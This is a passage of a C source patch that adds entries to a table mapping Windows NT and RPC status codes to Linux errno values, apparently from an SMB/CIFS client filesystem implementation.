++	{STATUS_REVOCATION_OFFLINE_C, -EIO, "STATUS_REVOCATION_OFFLINE_C"},
++	{STATUS_PKINIT_CLIENT_FAILURE, -EIO, "STATUS_PKINIT_CLIENT_FAILURE"},
++	{STATUS_SMARTCARD_CERT_EXPIRED, -EIO, "STATUS_SMARTCARD_CERT_EXPIRED"},
++	{STATUS_DRIVER_FAILED_PRIOR_UNLOAD, -EIO,
++	"STATUS_DRIVER_FAILED_PRIOR_UNLOAD"},
++	{STATUS_SMARTCARD_SILENT_CONTEXT, -EIO,
++	"STATUS_SMARTCARD_SILENT_CONTEXT"},
++	{STATUS_PER_USER_TRUST_QUOTA_EXCEEDED, -EDQUOT,
++	"STATUS_PER_USER_TRUST_QUOTA_EXCEEDED"},
++	{STATUS_ALL_USER_TRUST_QUOTA_EXCEEDED, -EDQUOT,
++	"STATUS_ALL_USER_TRUST_QUOTA_EXCEEDED"},
++	{STATUS_USER_DELETE_TRUST_QUOTA_EXCEEDED, -EDQUOT,
++	"STATUS_USER_DELETE_TRUST_QUOTA_EXCEEDED"},
++	{STATUS_DS_NAME_NOT_UNIQUE, -EIO, "STATUS_DS_NAME_NOT_UNIQUE"},
++	{STATUS_DS_DUPLICATE_ID_FOUND, -EIO, "STATUS_DS_DUPLICATE_ID_FOUND"},
++	{STATUS_DS_GROUP_CONVERSION_ERROR, -EIO,
++	"STATUS_DS_GROUP_CONVERSION_ERROR"},
++	{STATUS_VOLSNAP_PREPARE_HIBERNATE, -EIO,
++	"STATUS_VOLSNAP_PREPARE_HIBERNATE"},
++	{STATUS_USER2USER_REQUIRED, -EIO, "STATUS_USER2USER_REQUIRED"},
++	{STATUS_STACK_BUFFER_OVERRUN, -EIO, "STATUS_STACK_BUFFER_OVERRUN"},
++	{STATUS_NO_S4U_PROT_SUPPORT, -EIO, "STATUS_NO_S4U_PROT_SUPPORT"},
++	{STATUS_CROSSREALM_DELEGATION_FAILURE, -EIO,
++	"STATUS_CROSSREALM_DELEGATION_FAILURE"},
++	{STATUS_REVOCATION_OFFLINE_KDC, -EIO, "STATUS_REVOCATION_OFFLINE_KDC"},
++	{STATUS_ISSUING_CA_UNTRUSTED_KDC, -EIO,
++	"STATUS_ISSUING_CA_UNTRUSTED_KDC"},
++	{STATUS_KDC_CERT_EXPIRED, -EIO, "STATUS_KDC_CERT_EXPIRED"},
++	{STATUS_KDC_CERT_REVOKED, -EIO, "STATUS_KDC_CERT_REVOKED"},
++	{STATUS_PARAMETER_QUOTA_EXCEEDED, -EDQUOT,
++	"STATUS_PARAMETER_QUOTA_EXCEEDED"},
++	{STATUS_HIBERNATION_FAILURE, -EIO, "STATUS_HIBERNATION_FAILURE"},
++	{STATUS_DELAY_LOAD_FAILED, -EIO, "STATUS_DELAY_LOAD_FAILED"},
++	{STATUS_AUTHENTICATION_FIREWALL_FAILED, -EIO,
++	"STATUS_AUTHENTICATION_FIREWALL_FAILED"},
++	{STATUS_VDM_DISALLOWED, -EIO, "STATUS_VDM_DISALLOWED"},
++	{STATUS_HUNG_DISPLAY_DRIVER_THREAD, -EIO,
++	"STATUS_HUNG_DISPLAY_DRIVER_THREAD"},
++	{STATUS_INSUFFICIENT_RESOURCE_FOR_SPECIFIED_SHARED_SECTION_SIZE, -EIO,
++	"STATUS_INSUFFICIENT_RESOURCE_FOR_SPECIFIED_SHARED_SECTION_SIZE"},
++	{STATUS_INVALID_CRUNTIME_PARAMETER, -EIO,
++	"STATUS_INVALID_CRUNTIME_PARAMETER"},
++	{STATUS_NTLM_BLOCKED, -EIO, "STATUS_NTLM_BLOCKED"},
++	{STATUS_ASSERTION_FAILURE, -EIO, "STATUS_ASSERTION_FAILURE"},
++	{STATUS_VERIFIER_STOP, -EIO, "STATUS_VERIFIER_STOP"},
++	{STATUS_CALLBACK_POP_STACK, -EIO, "STATUS_CALLBACK_POP_STACK"},
++	{STATUS_INCOMPATIBLE_DRIVER_BLOCKED, -EIO,
++	"STATUS_INCOMPATIBLE_DRIVER_BLOCKED"},
++	{STATUS_HIVE_UNLOADED, -EIO, "STATUS_HIVE_UNLOADED"},
++	{STATUS_COMPRESSION_DISABLED, -EIO, "STATUS_COMPRESSION_DISABLED"},
++	{STATUS_FILE_SYSTEM_LIMITATION, -EIO, "STATUS_FILE_SYSTEM_LIMITATION"},
++	{STATUS_INVALID_IMAGE_HASH, -EIO, "STATUS_INVALID_IMAGE_HASH"},
++	{STATUS_NOT_CAPABLE, -EIO, "STATUS_NOT_CAPABLE"},
++	{STATUS_REQUEST_OUT_OF_SEQUENCE, -EIO,
++	"STATUS_REQUEST_OUT_OF_SEQUENCE"},
++	{STATUS_IMPLEMENTATION_LIMIT, -EIO, "STATUS_IMPLEMENTATION_LIMIT"},
++	{STATUS_ELEVATION_REQUIRED, -EIO, "STATUS_ELEVATION_REQUIRED"},
++	{STATUS_BEYOND_VDL, -EIO, "STATUS_BEYOND_VDL"},
++	{STATUS_ENCOUNTERED_WRITE_IN_PROGRESS, -EIO,
++	"STATUS_ENCOUNTERED_WRITE_IN_PROGRESS"},
++	{STATUS_PTE_CHANGED, -EIO, "STATUS_PTE_CHANGED"},
++	{STATUS_PURGE_FAILED, -EIO, "STATUS_PURGE_FAILED"},
++	{STATUS_CRED_REQUIRES_CONFIRMATION, -EIO,
++	"STATUS_CRED_REQUIRES_CONFIRMATION"},
++	{STATUS_CS_ENCRYPTION_INVALID_SERVER_RESPONSE, -EIO,
++	"STATUS_CS_ENCRYPTION_INVALID_SERVER_RESPONSE"},
++	{STATUS_CS_ENCRYPTION_UNSUPPORTED_SERVER, -EIO,
++	"STATUS_CS_ENCRYPTION_UNSUPPORTED_SERVER"},
++	{STATUS_CS_ENCRYPTION_EXISTING_ENCRYPTED_FILE, -EIO,
++	"STATUS_CS_ENCRYPTION_EXISTING_ENCRYPTED_FILE"},
++	{STATUS_CS_ENCRYPTION_NEW_ENCRYPTED_FILE, -EIO,
++	"STATUS_CS_ENCRYPTION_NEW_ENCRYPTED_FILE"},
++	{STATUS_CS_ENCRYPTION_FILE_NOT_CSE, -EIO,
++	"STATUS_CS_ENCRYPTION_FILE_NOT_CSE"},
++	{STATUS_INVALID_LABEL, -EIO, "STATUS_INVALID_LABEL"},
++	{STATUS_DRIVER_PROCESS_TERMINATED, -EIO,
++	"STATUS_DRIVER_PROCESS_TERMINATED"},
++	{STATUS_AMBIGUOUS_SYSTEM_DEVICE, -EIO,
++	"STATUS_AMBIGUOUS_SYSTEM_DEVICE"},
++	{STATUS_SYSTEM_DEVICE_NOT_FOUND, -EIO,
++	"STATUS_SYSTEM_DEVICE_NOT_FOUND"},
++	{STATUS_RESTART_BOOT_APPLICATION, -EIO,
++	"STATUS_RESTART_BOOT_APPLICATION"},
++	{STATUS_INVALID_TASK_NAME, -EIO, "STATUS_INVALID_TASK_NAME"},
++	{STATUS_INVALID_TASK_INDEX, -EIO, "STATUS_INVALID_TASK_INDEX"},
++	{STATUS_THREAD_ALREADY_IN_TASK, -EIO, "STATUS_THREAD_ALREADY_IN_TASK"},
++	{STATUS_CALLBACK_BYPASS, -EIO, "STATUS_CALLBACK_BYPASS"},
++	{STATUS_PORT_CLOSED, -EIO, "STATUS_PORT_CLOSED"},
++	{STATUS_MESSAGE_LOST, -EIO, "STATUS_MESSAGE_LOST"},
++	{STATUS_INVALID_MESSAGE, -EIO, "STATUS_INVALID_MESSAGE"},
++	{STATUS_REQUEST_CANCELED, -EIO, "STATUS_REQUEST_CANCELED"},
++	{STATUS_RECURSIVE_DISPATCH, -EIO, "STATUS_RECURSIVE_DISPATCH"},
++	{STATUS_LPC_RECEIVE_BUFFER_EXPECTED, -EIO,
++	"STATUS_LPC_RECEIVE_BUFFER_EXPECTED"},
++	{STATUS_LPC_INVALID_CONNECTION_USAGE, -EIO,
++	"STATUS_LPC_INVALID_CONNECTION_USAGE"},
++	{STATUS_LPC_REQUESTS_NOT_ALLOWED, -EIO,
++	"STATUS_LPC_REQUESTS_NOT_ALLOWED"},
++	{STATUS_RESOURCE_IN_USE, -EIO, "STATUS_RESOURCE_IN_USE"},
++	{STATUS_HARDWARE_MEMORY_ERROR, -EIO, "STATUS_HARDWARE_MEMORY_ERROR"},
++	{STATUS_THREADPOOL_HANDLE_EXCEPTION, -EIO,
++	"STATUS_THREADPOOL_HANDLE_EXCEPTION"},
++	{STATUS_THREADPOOL_SET_EVENT_ON_COMPLETION_FAILED, -EIO,
++	"STATUS_THREADPOOL_SET_EVENT_ON_COMPLETION_FAILED"},
++	{STATUS_THREADPOOL_RELEASE_SEMAPHORE_ON_COMPLETION_FAILED, -EIO,
++	"STATUS_THREADPOOL_RELEASE_SEMAPHORE_ON_COMPLETION_FAILED"},
++	{STATUS_THREADPOOL_RELEASE_MUTEX_ON_COMPLETION_FAILED, -EIO,
++	"STATUS_THREADPOOL_RELEASE_MUTEX_ON_COMPLETION_FAILED"},
++	{STATUS_THREADPOOL_FREE_LIBRARY_ON_COMPLETION_FAILED, -EIO,
++	"STATUS_THREADPOOL_FREE_LIBRARY_ON_COMPLETION_FAILED"},
++	{STATUS_THREADPOOL_RELEASED_DURING_OPERATION, -EIO,
++	"STATUS_THREADPOOL_RELEASED_DURING_OPERATION"},
++	{STATUS_CALLBACK_RETURNED_WHILE_IMPERSONATING, -EIO,
++	"STATUS_CALLBACK_RETURNED_WHILE_IMPERSONATING"},
++	{STATUS_APC_RETURNED_WHILE_IMPERSONATING, -EIO,
++	"STATUS_APC_RETURNED_WHILE_IMPERSONATING"},
++	{STATUS_PROCESS_IS_PROTECTED, -EIO, "STATUS_PROCESS_IS_PROTECTED"},
++	{STATUS_MCA_EXCEPTION, -EIO, "STATUS_MCA_EXCEPTION"},
++	{STATUS_CERTIFICATE_MAPPING_NOT_UNIQUE, -EIO,
++	"STATUS_CERTIFICATE_MAPPING_NOT_UNIQUE"},
++	{STATUS_SYMLINK_CLASS_DISABLED, -EIO, "STATUS_SYMLINK_CLASS_DISABLED"},
++	{STATUS_INVALID_IDN_NORMALIZATION, -EIO,
++	"STATUS_INVALID_IDN_NORMALIZATION"},
++	{STATUS_NO_UNICODE_TRANSLATION, -EIO, "STATUS_NO_UNICODE_TRANSLATION"},
++	{STATUS_ALREADY_REGISTERED, -EIO, "STATUS_ALREADY_REGISTERED"},
++	{STATUS_CONTEXT_MISMATCH, -EIO, "STATUS_CONTEXT_MISMATCH"},
++	{STATUS_PORT_ALREADY_HAS_COMPLETION_LIST, -EIO,
++	"STATUS_PORT_ALREADY_HAS_COMPLETION_LIST"},
++	{STATUS_CALLBACK_RETURNED_THREAD_PRIORITY, -EIO,
++	"STATUS_CALLBACK_RETURNED_THREAD_PRIORITY"},
++	{STATUS_INVALID_THREAD, -EIO, "STATUS_INVALID_THREAD"},
++	{STATUS_CALLBACK_RETURNED_TRANSACTION, -EIO,
++	"STATUS_CALLBACK_RETURNED_TRANSACTION"},
++	{STATUS_CALLBACK_RETURNED_LDR_LOCK, -EIO,
++	"STATUS_CALLBACK_RETURNED_LDR_LOCK"},
++	{STATUS_CALLBACK_RETURNED_LANG, -EIO, "STATUS_CALLBACK_RETURNED_LANG"},
++	{STATUS_CALLBACK_RETURNED_PRI_BACK, -EIO,
++	"STATUS_CALLBACK_RETURNED_PRI_BACK"},
++	{STATUS_CALLBACK_RETURNED_THREAD_AFFINITY, -EIO,
++	"STATUS_CALLBACK_RETURNED_THREAD_AFFINITY"},
++	{STATUS_DISK_REPAIR_DISABLED, -EIO, "STATUS_DISK_REPAIR_DISABLED"},
++	{STATUS_DS_DOMAIN_RENAME_IN_PROGRESS, -EIO,
++	"STATUS_DS_DOMAIN_RENAME_IN_PROGRESS"},
++	{STATUS_DISK_QUOTA_EXCEEDED, -EDQUOT, "STATUS_DISK_QUOTA_EXCEEDED"},
++	{STATUS_CONTENT_BLOCKED, -EIO, "STATUS_CONTENT_BLOCKED"},
++	{STATUS_BAD_CLUSTERS, -EIO, "STATUS_BAD_CLUSTERS"},
++	{STATUS_VOLUME_DIRTY, -EIO, "STATUS_VOLUME_DIRTY"},
++	{STATUS_FILE_CHECKED_OUT, -EIO, "STATUS_FILE_CHECKED_OUT"},
++	{STATUS_CHECKOUT_REQUIRED, -EIO, "STATUS_CHECKOUT_REQUIRED"},
++	{STATUS_BAD_FILE_TYPE, -EIO, "STATUS_BAD_FILE_TYPE"},
++	{STATUS_FILE_TOO_LARGE, -EIO, "STATUS_FILE_TOO_LARGE"},
++	{STATUS_FORMS_AUTH_REQUIRED, -EIO, "STATUS_FORMS_AUTH_REQUIRED"},
++	{STATUS_VIRUS_INFECTED, -EIO, "STATUS_VIRUS_INFECTED"},
++	{STATUS_VIRUS_DELETED, -EIO, "STATUS_VIRUS_DELETED"},
++	{STATUS_BAD_MCFG_TABLE, -EIO, "STATUS_BAD_MCFG_TABLE"},
++	{STATUS_WOW_ASSERTION, -EIO, "STATUS_WOW_ASSERTION"},
++	{STATUS_INVALID_SIGNATURE, -EIO, "STATUS_INVALID_SIGNATURE"},
++	{STATUS_HMAC_NOT_SUPPORTED, -EIO, "STATUS_HMAC_NOT_SUPPORTED"},
++	{STATUS_IPSEC_QUEUE_OVERFLOW, -EIO, "STATUS_IPSEC_QUEUE_OVERFLOW"},
++	{STATUS_ND_QUEUE_OVERFLOW, -EIO, "STATUS_ND_QUEUE_OVERFLOW"},
++	{STATUS_HOPLIMIT_EXCEEDED, -EIO, "STATUS_HOPLIMIT_EXCEEDED"},
++	{STATUS_PROTOCOL_NOT_SUPPORTED, -EOPNOTSUPP,
++	"STATUS_PROTOCOL_NOT_SUPPORTED"},
++	{STATUS_LOST_WRITEBEHIND_DATA_NETWORK_DISCONNECTED, -EIO,
++	"STATUS_LOST_WRITEBEHIND_DATA_NETWORK_DISCONNECTED"},
++	{STATUS_LOST_WRITEBEHIND_DATA_NETWORK_SERVER_ERROR, -EIO,
++	"STATUS_LOST_WRITEBEHIND_DATA_NETWORK_SERVER_ERROR"},
++	{STATUS_LOST_WRITEBEHIND_DATA_LOCAL_DISK_ERROR, -EIO,
++	"STATUS_LOST_WRITEBEHIND_DATA_LOCAL_DISK_ERROR"},
++	{STATUS_XML_PARSE_ERROR, -EIO, "STATUS_XML_PARSE_ERROR"},
++	{STATUS_XMLDSIG_ERROR, -EIO, "STATUS_XMLDSIG_ERROR"},
++	{STATUS_WRONG_COMPARTMENT, -EIO, "STATUS_WRONG_COMPARTMENT"},
++	{STATUS_AUTHIP_FAILURE, -EIO, "STATUS_AUTHIP_FAILURE"},
++	{DBG_NO_STATE_CHANGE, -EIO, "DBG_NO_STATE_CHANGE"},
++	{DBG_APP_NOT_IDLE, -EIO, "DBG_APP_NOT_IDLE"},
++	{RPC_NT_INVALID_STRING_BINDING, -EIO, "RPC_NT_INVALID_STRING_BINDING"},
++	{RPC_NT_WRONG_KIND_OF_BINDING, -EIO, "RPC_NT_WRONG_KIND_OF_BINDING"},
++	{RPC_NT_INVALID_BINDING, -EIO, "RPC_NT_INVALID_BINDING"},
++	{RPC_NT_PROTSEQ_NOT_SUPPORTED, -EOPNOTSUPP,
++	"RPC_NT_PROTSEQ_NOT_SUPPORTED"},
++	{RPC_NT_INVALID_RPC_PROTSEQ, -EIO, "RPC_NT_INVALID_RPC_PROTSEQ"},
++	{RPC_NT_INVALID_STRING_UUID, -EIO, "RPC_NT_INVALID_STRING_UUID"},
++	{RPC_NT_INVALID_ENDPOINT_FORMAT, -EIO,
++	"RPC_NT_INVALID_ENDPOINT_FORMAT"},
++	{RPC_NT_INVALID_NET_ADDR, -EIO, "RPC_NT_INVALID_NET_ADDR"},
++	{RPC_NT_NO_ENDPOINT_FOUND, -EIO, "RPC_NT_NO_ENDPOINT_FOUND"},
++	{RPC_NT_INVALID_TIMEOUT, -EINVAL, "RPC_NT_INVALID_TIMEOUT"},
++	{RPC_NT_OBJECT_NOT_FOUND, -ENOENT, "RPC_NT_OBJECT_NOT_FOUND"},
++	{RPC_NT_ALREADY_REGISTERED, -EIO, "RPC_NT_ALREADY_REGISTERED"},
++	{RPC_NT_TYPE_ALREADY_REGISTERED, -EIO,
++	"RPC_NT_TYPE_ALREADY_REGISTERED"},
++	{RPC_NT_ALREADY_LISTENING, -EIO, "RPC_NT_ALREADY_LISTENING"},
++	{RPC_NT_NO_PROTSEQS_REGISTERED, -EIO, "RPC_NT_NO_PROTSEQS_REGISTERED"},
++	{RPC_NT_NOT_LISTENING, -EIO, "RPC_NT_NOT_LISTENING"},
++	{RPC_NT_UNKNOWN_MGR_TYPE, -EIO, "RPC_NT_UNKNOWN_MGR_TYPE"},
++	{RPC_NT_UNKNOWN_IF, -EIO, "RPC_NT_UNKNOWN_IF"},
++	{RPC_NT_NO_BINDINGS, -EIO, "RPC_NT_NO_BINDINGS"},
++	{RPC_NT_NO_PROTSEQS, -EIO, "RPC_NT_NO_PROTSEQS"},
++	{RPC_NT_CANT_CREATE_ENDPOINT, -EIO, "RPC_NT_CANT_CREATE_ENDPOINT"},
++	{RPC_NT_OUT_OF_RESOURCES, -EIO, "RPC_NT_OUT_OF_RESOURCES"},
++	{RPC_NT_SERVER_UNAVAILABLE, -EIO, "RPC_NT_SERVER_UNAVAILABLE"},
++	{RPC_NT_SERVER_TOO_BUSY, -EBUSY, "RPC_NT_SERVER_TOO_BUSY"},
++	{RPC_NT_INVALID_NETWORK_OPTIONS, -EIO,
++	"RPC_NT_INVALID_NETWORK_OPTIONS"},
++	{RPC_NT_NO_CALL_ACTIVE, -EIO, "RPC_NT_NO_CALL_ACTIVE"},
++	{RPC_NT_CALL_FAILED, -EIO, "RPC_NT_CALL_FAILED"},
++	{RPC_NT_CALL_FAILED_DNE, -EIO, "RPC_NT_CALL_FAILED_DNE"},
++	{RPC_NT_PROTOCOL_ERROR, -EIO, "RPC_NT_PROTOCOL_ERROR"},
++	{RPC_NT_UNSUPPORTED_TRANS_SYN, -EIO, "RPC_NT_UNSUPPORTED_TRANS_SYN"},
++	{RPC_NT_UNSUPPORTED_TYPE, -EIO, "RPC_NT_UNSUPPORTED_TYPE"},
++	{RPC_NT_INVALID_TAG, -EIO, "RPC_NT_INVALID_TAG"},
++	{RPC_NT_INVALID_BOUND, -EIO, "RPC_NT_INVALID_BOUND"},
++	{RPC_NT_NO_ENTRY_NAME, -EIO, "RPC_NT_NO_ENTRY_NAME"},
++	{RPC_NT_INVALID_NAME_SYNTAX, -EIO, "RPC_NT_INVALID_NAME_SYNTAX"},
++	{RPC_NT_UNSUPPORTED_NAME_SYNTAX, -EIO,
++	"RPC_NT_UNSUPPORTED_NAME_SYNTAX"},
++	{RPC_NT_UUID_NO_ADDRESS, -EIO, "RPC_NT_UUID_NO_ADDRESS"},
++	{RPC_NT_DUPLICATE_ENDPOINT, -ENOTUNIQ, "RPC_NT_DUPLICATE_ENDPOINT"},
++	{RPC_NT_UNKNOWN_AUTHN_TYPE, -EIO, "RPC_NT_UNKNOWN_AUTHN_TYPE"},
++	{RPC_NT_MAX_CALLS_TOO_SMALL, -EIO, "RPC_NT_MAX_CALLS_TOO_SMALL"},
++	{RPC_NT_STRING_TOO_LONG, -EIO, "RPC_NT_STRING_TOO_LONG"},
++	{RPC_NT_PROTSEQ_NOT_FOUND, -EIO, "RPC_NT_PROTSEQ_NOT_FOUND"},
++	{RPC_NT_PROCNUM_OUT_OF_RANGE, -EIO, "RPC_NT_PROCNUM_OUT_OF_RANGE"},
++	{RPC_NT_BINDING_HAS_NO_AUTH, -EIO, "RPC_NT_BINDING_HAS_NO_AUTH"},
++	{RPC_NT_UNKNOWN_AUTHN_SERVICE, -EIO, "RPC_NT_UNKNOWN_AUTHN_SERVICE"},
++	{RPC_NT_UNKNOWN_AUTHN_LEVEL, -EIO, "RPC_NT_UNKNOWN_AUTHN_LEVEL"},
++	{RPC_NT_INVALID_AUTH_IDENTITY, -EIO, "RPC_NT_INVALID_AUTH_IDENTITY"},
++	{RPC_NT_UNKNOWN_AUTHZ_SERVICE, -EIO, "RPC_NT_UNKNOWN_AUTHZ_SERVICE"},
++	{EPT_NT_INVALID_ENTRY, -EIO, "EPT_NT_INVALID_ENTRY"},
++	{EPT_NT_CANT_PERFORM_OP, -EIO, "EPT_NT_CANT_PERFORM_OP"},
++	{EPT_NT_NOT_REGISTERED, -EIO, "EPT_NT_NOT_REGISTERED"},
++	{RPC_NT_NOTHING_TO_EXPORT, -EIO, "RPC_NT_NOTHING_TO_EXPORT"},
++	{RPC_NT_INCOMPLETE_NAME, -EIO, "RPC_NT_INCOMPLETE_NAME"},
++	{RPC_NT_INVALID_VERS_OPTION, -EIO, "RPC_NT_INVALID_VERS_OPTION"},
++	{RPC_NT_NO_MORE_MEMBERS, -EIO, "RPC_NT_NO_MORE_MEMBERS"},
++	{RPC_NT_NOT_ALL_OBJS_UNEXPORTED, -EIO,
++	"RPC_NT_NOT_ALL_OBJS_UNEXPORTED"},
++	{RPC_NT_INTERFACE_NOT_FOUND, -EIO, "RPC_NT_INTERFACE_NOT_FOUND"},
++	{RPC_NT_ENTRY_ALREADY_EXISTS, -EIO, "RPC_NT_ENTRY_ALREADY_EXISTS"},
++	{RPC_NT_ENTRY_NOT_FOUND, -EIO, "RPC_NT_ENTRY_NOT_FOUND"},
++	{RPC_NT_NAME_SERVICE_UNAVAILABLE, -EIO,
++	"RPC_NT_NAME_SERVICE_UNAVAILABLE"},
++	{RPC_NT_INVALID_NAF_ID, -EIO, "RPC_NT_INVALID_NAF_ID"},
++	{RPC_NT_CANNOT_SUPPORT, -EOPNOTSUPP, "RPC_NT_CANNOT_SUPPORT"},
++	{RPC_NT_NO_CONTEXT_AVAILABLE, -EIO, "RPC_NT_NO_CONTEXT_AVAILABLE"},
++	{RPC_NT_INTERNAL_ERROR, -EIO, "RPC_NT_INTERNAL_ERROR"},
++	{RPC_NT_ZERO_DIVIDE, -EIO, "RPC_NT_ZERO_DIVIDE"},
++	{RPC_NT_ADDRESS_ERROR, -EIO, "RPC_NT_ADDRESS_ERROR"},
++	{RPC_NT_FP_DIV_ZERO, -EIO, "RPC_NT_FP_DIV_ZERO"},
++	{RPC_NT_FP_UNDERFLOW, -EIO, "RPC_NT_FP_UNDERFLOW"},
++	{RPC_NT_FP_OVERFLOW, -EIO, "RPC_NT_FP_OVERFLOW"},
++	{RPC_NT_CALL_IN_PROGRESS, -EIO, "RPC_NT_CALL_IN_PROGRESS"},
++	{RPC_NT_NO_MORE_BINDINGS, -EIO, "RPC_NT_NO_MORE_BINDINGS"},
++	{RPC_NT_GROUP_MEMBER_NOT_FOUND, -EIO, "RPC_NT_GROUP_MEMBER_NOT_FOUND"},
++	{EPT_NT_CANT_CREATE, -EIO, "EPT_NT_CANT_CREATE"},
++	{RPC_NT_INVALID_OBJECT, -EIO, "RPC_NT_INVALID_OBJECT"},
++	{RPC_NT_NO_INTERFACES, -EIO, "RPC_NT_NO_INTERFACES"},
++	{RPC_NT_CALL_CANCELLED, -EIO, "RPC_NT_CALL_CANCELLED"},
++	{RPC_NT_BINDING_INCOMPLETE, -EIO, "RPC_NT_BINDING_INCOMPLETE"},
++	{RPC_NT_COMM_FAILURE, -EIO, "RPC_NT_COMM_FAILURE"},
++	{RPC_NT_UNSUPPORTED_AUTHN_LEVEL, -EIO,
++	"RPC_NT_UNSUPPORTED_AUTHN_LEVEL"},
++	{RPC_NT_NO_PRINC_NAME, -EIO, "RPC_NT_NO_PRINC_NAME"},
++	{RPC_NT_NOT_RPC_ERROR, -EIO, "RPC_NT_NOT_RPC_ERROR"},
++	{RPC_NT_SEC_PKG_ERROR, -EIO, "RPC_NT_SEC_PKG_ERROR"},
++	{RPC_NT_NOT_CANCELLED, -EIO, "RPC_NT_NOT_CANCELLED"},
++	{RPC_NT_INVALID_ASYNC_HANDLE, -EIO, "RPC_NT_INVALID_ASYNC_HANDLE"},
++	{RPC_NT_INVALID_ASYNC_CALL, -EIO, "RPC_NT_INVALID_ASYNC_CALL"},
++	{RPC_NT_PROXY_ACCESS_DENIED, -EACCES, "RPC_NT_PROXY_ACCESS_DENIED"},
++	{RPC_NT_NO_MORE_ENTRIES, -EIO, "RPC_NT_NO_MORE_ENTRIES"},
++	{RPC_NT_SS_CHAR_TRANS_OPEN_FAIL, -EIO,
++	"RPC_NT_SS_CHAR_TRANS_OPEN_FAIL"},
++	{RPC_NT_SS_CHAR_TRANS_SHORT_FILE, -EIO,
++	"RPC_NT_SS_CHAR_TRANS_SHORT_FILE"},
++	{RPC_NT_SS_IN_NULL_CONTEXT, -EIO, "RPC_NT_SS_IN_NULL_CONTEXT"},
++	{RPC_NT_SS_CONTEXT_MISMATCH, -EIO, "RPC_NT_SS_CONTEXT_MISMATCH"},
++	{RPC_NT_SS_CONTEXT_DAMAGED, -EIO, "RPC_NT_SS_CONTEXT_DAMAGED"},
++	{RPC_NT_SS_HANDLES_MISMATCH, -EIO, "RPC_NT_SS_HANDLES_MISMATCH"},
++	{RPC_NT_SS_CANNOT_GET_CALL_HANDLE, -EIO,
++	"RPC_NT_SS_CANNOT_GET_CALL_HANDLE"},
++	{RPC_NT_NULL_REF_POINTER, -EIO, "RPC_NT_NULL_REF_POINTER"},
++	{RPC_NT_ENUM_VALUE_OUT_OF_RANGE, -EIO,
++	"RPC_NT_ENUM_VALUE_OUT_OF_RANGE"},
++	{RPC_NT_BYTE_COUNT_TOO_SMALL, -EIO, "RPC_NT_BYTE_COUNT_TOO_SMALL"},
++	{RPC_NT_BAD_STUB_DATA, -EIO, "RPC_NT_BAD_STUB_DATA"},
++	{RPC_NT_INVALID_ES_ACTION, -EIO, "RPC_NT_INVALID_ES_ACTION"},
++	{RPC_NT_WRONG_ES_VERSION, -EIO, "RPC_NT_WRONG_ES_VERSION"},
++	{RPC_NT_WRONG_STUB_VERSION, -EIO, "RPC_NT_WRONG_STUB_VERSION"},
++	{RPC_NT_INVALID_PIPE_OBJECT, -EIO, "RPC_NT_INVALID_PIPE_OBJECT"},
++	{RPC_NT_INVALID_PIPE_OPERATION, -EIO, "RPC_NT_INVALID_PIPE_OPERATION"},
++	{RPC_NT_WRONG_PIPE_VERSION, -EIO, "RPC_NT_WRONG_PIPE_VERSION"},
++	{RPC_NT_PIPE_CLOSED, -EIO, "RPC_NT_PIPE_CLOSED"},
++	{RPC_NT_PIPE_DISCIPLINE_ERROR, -EIO, "RPC_NT_PIPE_DISCIPLINE_ERROR"},
++	{RPC_NT_PIPE_EMPTY, -EIO, "RPC_NT_PIPE_EMPTY"},
++	{STATUS_PNP_BAD_MPS_TABLE, -EIO, "STATUS_PNP_BAD_MPS_TABLE"},
++	{STATUS_PNP_TRANSLATION_FAILED, -EIO, "STATUS_PNP_TRANSLATION_FAILED"},
++	{STATUS_PNP_IRQ_TRANSLATION_FAILED, -EIO,
++	"STATUS_PNP_IRQ_TRANSLATION_FAILED"},
++	{STATUS_PNP_INVALID_ID, -EIO, "STATUS_PNP_INVALID_ID"},
++	{STATUS_IO_REISSUE_AS_CACHED, -EIO, "STATUS_IO_REISSUE_AS_CACHED"},
++	{STATUS_CTX_WINSTATION_NAME_INVALID, -EIO,
++	"STATUS_CTX_WINSTATION_NAME_INVALID"},
++	{STATUS_CTX_INVALID_PD, -EIO, "STATUS_CTX_INVALID_PD"},
++	{STATUS_CTX_PD_NOT_FOUND, -EIO, "STATUS_CTX_PD_NOT_FOUND"},
++	{STATUS_CTX_CLOSE_PENDING, -EIO, "STATUS_CTX_CLOSE_PENDING"},
++	{STATUS_CTX_NO_OUTBUF, -EIO, "STATUS_CTX_NO_OUTBUF"},
++	{STATUS_CTX_MODEM_INF_NOT_FOUND, -EIO,
++	"STATUS_CTX_MODEM_INF_NOT_FOUND"},
++	{STATUS_CTX_INVALID_MODEMNAME, -EIO, "STATUS_CTX_INVALID_MODEMNAME"},
++	{STATUS_CTX_RESPONSE_ERROR, -EIO, "STATUS_CTX_RESPONSE_ERROR"},
++	{STATUS_CTX_MODEM_RESPONSE_TIMEOUT, -ETIMEDOUT,
++	"STATUS_CTX_MODEM_RESPONSE_TIMEOUT"},
++	{STATUS_CTX_MODEM_RESPONSE_NO_CARRIER, -EIO,
++	"STATUS_CTX_MODEM_RESPONSE_NO_CARRIER"},
++	{STATUS_CTX_MODEM_RESPONSE_NO_DIALTONE, -EIO,
++	"STATUS_CTX_MODEM_RESPONSE_NO_DIALTONE"},
++	{STATUS_CTX_MODEM_RESPONSE_BUSY, -EBUSY,
++	"STATUS_CTX_MODEM_RESPONSE_BUSY"},
++	{STATUS_CTX_MODEM_RESPONSE_VOICE, -EIO,
++	"STATUS_CTX_MODEM_RESPONSE_VOICE"},
++	{STATUS_CTX_TD_ERROR, -EIO, "STATUS_CTX_TD_ERROR"},
++	{STATUS_CTX_LICENSE_CLIENT_INVALID, -EIO,
++	"STATUS_CTX_LICENSE_CLIENT_INVALID"},
++	{STATUS_CTX_LICENSE_NOT_AVAILABLE, -EIO,
++	"STATUS_CTX_LICENSE_NOT_AVAILABLE"},
++	{STATUS_CTX_LICENSE_EXPIRED, -EIO, "STATUS_CTX_LICENSE_EXPIRED"},
++	{STATUS_CTX_WINSTATION_NOT_FOUND, -EIO,
++	"STATUS_CTX_WINSTATION_NOT_FOUND"},
++	{STATUS_CTX_WINSTATION_NAME_COLLISION, -EIO,
++	"STATUS_CTX_WINSTATION_NAME_COLLISION"},
++	{STATUS_CTX_WINSTATION_BUSY, -EBUSY, "STATUS_CTX_WINSTATION_BUSY"},
++	{STATUS_CTX_BAD_VIDEO_MODE, -EIO, "STATUS_CTX_BAD_VIDEO_MODE"},
++	{STATUS_CTX_GRAPHICS_INVALID, -EIO, "STATUS_CTX_GRAPHICS_INVALID"},
++	{STATUS_CTX_NOT_CONSOLE, -EIO, "STATUS_CTX_NOT_CONSOLE"},
